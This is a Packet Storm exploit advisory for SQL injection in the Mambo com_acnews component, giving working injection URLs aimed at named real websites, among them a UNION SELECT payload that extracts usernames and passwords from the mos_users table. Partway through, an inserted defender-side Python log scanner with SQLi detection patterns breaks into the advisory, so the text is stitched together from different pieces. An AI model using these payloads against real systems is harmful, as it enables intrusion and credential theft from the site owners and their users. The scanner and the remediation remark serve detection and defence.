Mambo ACNews SQL Injection

2010-02-16T00:00:00
ID PACKETSTORM:86369
Type packetstorm
Reporter Xzit3
Modified 2010-02-16T00:00:00

Description

# Title: Mambo Component com_acnews [id] | SQL Injection  
# Date: 15/02/2010  
# Author: Ro0T-MaFia  
# Software Link: ....  
# Version: ...  
# Tested on: http://www.artcommedia.com/index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--  
---  
  
Mambo Component com_acnews [id] | SQL Injection  
  
Author: Zero Bits & Xzit3  
Team: Ro0T-MaFia  
Members: Zero Bits, CMD, Jeferx, Xzit3, XP3RM4 & Jeferx  
Date: 15/02/2010  
Contact: Zer_Bits@GobiernoFederal.com - wscalle1@e-r00t.org  
Country: Venezuela - Mexico  
############################  
  
Vulnerabilities:  
  
[+] SQL Injection:  
Error: You have an error in your SQL syntax.  
  
  
BUG: index.php?lang=en&option=com_acnews&task=view&id=188 (SQLi)  
  
Real example:  
  
http://www.artcom.net/index.php?lang=en&option=com_acnews&task=view&id=-188'&Itemid=136&page=0 (Web Vuln.)  
http://www.artcom.de/index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0  
  
http://www.artcommedia.com/index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--  
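As an added, defender-side example that is not part of this advisory: a small Python scanner that reads web-server access-log lines and flags com_acnews requests whose `id` or `Itemid` parameter is not a plain integer, which is exactly the shape of the requests listed above (a quote appended to the value, or a UNION SELECT in place of a number). The log format (Apache common/combined style), the client addresses and the timestamps are assumptions; the request paths mirror the ones in this advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (assumed Apache-style format). Paths 2-4 mirror
# the request shapes reported in the advisory; lines 1 and 5 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Feb/2010:10:01:02 +0000] "GET /index.php?lang=en&option=com_acnews&task=view&id=188 HTTP/1.1" 200 5120
203.0.113.5 - - [15/Feb/2010:10:01:09 +0000] "GET /index.php?lang=en&option=com_acnews&task=view&id=-188'&Itemid=136&page=0 HTTP/1.1" 200 812
203.0.113.5 - - [15/Feb/2010:10:01:15 +0000] "GET /index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0 HTTP/1.1" 200 790
203.0.113.5 - - [15/Feb/2010:10:02:30 +0000] "GET /index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users-- HTTP/1.1" 200 3301
203.0.113.9 - - [15/Feb/2010:10:03:00 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 4400
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')
# Parameters the component is expected to treat as integers (from the advisory).
INT_PARAMS = ("id", "Itemid")
# Fragments that mark a non-integer value as an injection attempt rather than a typo.
SQLI_RE = re.compile(r"(union\s+select|concat\(|mos_users|--|/\*|'|\")", re.I)

def classify_request(path):
    """Return [(param, kind, decoded_value), ...] for a com_acnews request, else []."""
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)  # percent-decodes, '+' -> ' '
    if qs.get("option", [""])[0] != "com_acnews":
        return []
    findings = []
    for name in INT_PARAMS:
        for value in qs.get(name, []):
            if not re.fullmatch(r"-?\d+", value):
                kind = "sqli-pattern" if SQLI_RE.search(value) else "non-integer"
                findings.append((name, kind, value))
    return findings

def scan_log(text):
    """Return [(ip, timestamp, findings), ...] for every log line with suspicious com_acnews params."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m["path"])
        if findings:
            hits.append((m["ip"], m["ts"], findings))
    return hits

if __name__ == "__main__":
    for ip, ts, findings in scan_log(SAMPLE_LOG):
        print(ip, ts, findings)
```

The same integer check, applied server-side before the value reaches the query (or a parameterized query), is what removes the bug; the scanner only shows where the pattern already appears in traffic.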
  
###########################  
  
Visit:  
  
Ilegalintrusion.NET | Seguridadblanca.ORG | Diosdelared.COM | Remoteexecution.ORG  